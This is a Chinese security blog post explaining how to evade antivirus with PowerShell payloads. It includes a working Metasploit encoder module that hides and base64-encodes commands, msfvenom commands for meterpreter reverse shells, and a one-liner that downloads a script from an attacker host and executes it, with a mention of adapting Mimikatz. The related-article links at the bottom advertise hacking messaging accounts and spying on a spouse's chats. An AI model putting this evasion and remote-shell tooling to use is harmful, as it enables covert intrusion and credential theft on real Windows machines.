关于Powershell对抗安全软件

hacker4年前黑客资讯310

  Windows PowerShell是以.NET Framework技术为基础,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术。

  同时也包含了数种系统管理工具、简易且一致的语法,提升管理者处理,常见如登录数据库、WMI。Exchange Server 2007以及System Center Operations Manager 2007等服务器软件都将内置Windows PowerShell。

  Windows PowerShell的强大,并且内置,在渗透过程中,也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell的一切行为。

  

  在https://technet.microsoft.com,看到文档如下:

  Here is a listing of the available startup parameters:

  -Command Specifies the command text to execute as though it were typed at the PowerShell command prompt.

  -EncodedCommand Specifies the base64-encoded command text to execute.

  -ExecutionPolicy Sets the default execution policy for the console session.

  -File Sets the name of a script fi le to execute.

  -InputFormat Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML.

  -NoExit Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt (cmd.exe).

  -NoLogo Starts the PowerShell console without displaying the copyright banner.

  -Noninteractive Starts the PowerShell console in non-interactive mode. In this mode, PowerShell does not present an interactive prompt to the user.

  -NoProfile Tells the PowerShell console not to load the current user’s profile.

  -OutputFormat Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML.

  -PSConsoleFile Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap-in extensions are loaded and available. You can create a console file using Export-Console in Windows PowerShell.

  -Sta Starts PowerShell in single-threaded mode.

  -Version Sets the version of Windows PowerShell to use for compatibility, such as 1.0.

  -WindowStyle Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal.

  针对它的特性,本地测试:

  Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Micropoor')

  

  

  上文所说,越来越多的杀软开始对抗,powershell的部分行为,或者特征。以msfvenom为例,生成payload。 https://www.secpulse.com/archives/71225.html

  micropoor.ps1不幸被杀。

  

  

  针对powershell特性,更改payload

  

  接下来考虑的事情是如何把以上重复的工作变成自动化,并且针对powershell,DownloadString特性,设计出2种payload形式:

  (1)目标机出网

  (2)目标机不出网

  并且根据需求,无缝连接Metasploit。https://www.secpulse.com/archives/71225.html

  根据微软文档,可以找到可能对以上有帮助的属性,分别为:

  WindowStyle

  NoExit

  EncodedCommand

  exec

  自动化实现如下:

  # copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.

  # E.g

  # msf encoder(powershell/base64) > use exploit/multi/handler

  # msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

  # payload => windows/x64/meterpreter/reverse_tcp

  # msf exploit(multi/handler) > exploit

  # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  # [*] Started reverse TCP handler on xx.1xx.xx.xx:xx

  class MetasploitModule < Msf::Encoder

  Rank = NormalRanking

  def initialize

  super(

  'Name' => 'Powershell Base64 Encoder',

  'Description' => %q{

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  },

  'Author' => 'Micropoor',

  'Arch' => ARCH_CMD,

  'Platform' => 'win')

  register_options([

  OptBool.new('payload', [ false, 'Use payload ', false ]),

  OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])

  ])

  end

  def encode_block(state, buf)

  base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))

  cmd = ''

  if datastore['x64']

  cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '

  else

  cmd += 'powershell.exe '

  end

  if datastore['payload']

  cmd += '-windowstyle hidden -exec bypass -NoExit '

  end

  cmd += "-EncodedCommand #{base64}"

  end

  end

  # if use caidao

  # execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows

  # xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  copy powershell_base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.

  参数 payload 选择是否使用Metasploit payload,来去掉powershell的关键字。

  例1(目标出网,下载执行):

  echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/micropoor.ps1');\"" |msfvenom -e powershell/base64 --arch x64 --platform windows

  

  

  例2(目标不出网,本地执行)

  

  注:加payload参数

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=8080 -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows payload

  更多有趣的实验:

  把例1的down内容更改为例2,并且去掉payload参数。来减小payload大小。

  更改Invoke-Mimikatz.ps1等。

  

  参考致谢

  https://technet.microsoft.com/en-us/library/ff629472.aspx

  https://www.secpulse.com/archives/tag/powershell

  https://github.com/danielbohannon/Invoke-Obfuscation

标签: 渗透测试

相关文章

有什么软件可以查老婆微信聊天已删好友

作为一款颠覆行业的摄影机,RED KOMODO被誉为“以最低价格获得最高级别电影级图像的摄影机”。其自身的革命性突破在于:先进、小巧、轻便,性能指标在几年内保持领先。模块大小,却是一台全功能、可独立工...

广州发现猪人(各类猪人谣传事件)

广州发现猪人(各类猪人谣传事件) 世界无奇不有,广州有个叫石老二的采药人在南坝的山林里发现了一窝猪人,当时见多识广的老二当场晕倒过去,当他醒来,发现有一头小猪人在舔着他的脸,他再次晕倒。不知过了多久...

点进被盗号人发的网址(笔点网址导航)

想问一下,改过密码后有什么问题吗?我刚刚也干了这蠢事……都输过密码了我才反应过来。 在你的QQ设置里面,去加强你的个人认证信息,绑定你的手机号码、邮箱,或者是实名认证你的个人信息,就可以有效的防止被...

怎么找黑客帮忙盗微信(微信黑客盗号是真的吗)

谈起密码算法,有的人会觉得陌生,但一提起PGP,大多数网上朋友都很熟悉,它是一个工具软件,向认证中心注册后就可以用它对文件进行加解密或数字签名,PGP所采用的是RSA算法,以后我们会对它展开讨论。密码...

黑客帝国觉醒的英语(黑客帝国英文名称)

黑客帝国觉醒的英语(黑客帝国英文名称)

本文导读目录: 1、Matrix的意思 2、翻译黑客帝国 3、黑客帝国用英语单词怎么翻译? 4、黑客帝国的台词很摆(就是很酷),有人是英语专业的吗?“我学会功夫了”的英语是“i learn...

qq黑客网站哪里的更好呢?如何选择黑客网站

qq黑客网站哪里的更好呢?如何选择黑客网站

QQ是当下非常流行的交流软件,人们多会使用qq进行沟通和交流,并且qq的价值也是非常高的,这就让许多人把矛头瞄向了盗取qq上面,而通常会使用到黑客手段,而现在的黑客网站非常多,这就方便了人们能够更好的...